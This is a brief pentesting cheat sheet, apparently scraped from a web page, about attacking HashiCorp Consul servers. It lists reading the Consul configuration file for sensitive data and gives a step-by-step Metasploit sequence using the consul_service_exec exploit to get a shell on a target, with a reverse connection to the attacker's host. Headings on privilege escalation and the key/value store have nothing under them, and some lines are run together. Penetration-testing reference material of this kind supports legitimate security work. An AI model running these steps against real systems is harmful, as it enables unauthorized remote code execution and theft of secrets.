HashiCorp Consul Pentesting
Interesting Files in Target System
cat /etc/consul.d/config.jsonRCE
msfconsole
msf> use exploit/multi/misc/consul_service_exec
msf> set rhosts <target-ip>
msf> set lhost <your-ip>
msf> run
# Session created...
msf> shell # Spawn the shell
whoami # Run command in the target systemPrivilege Escalation
KV (Key/Value) Store
Last updated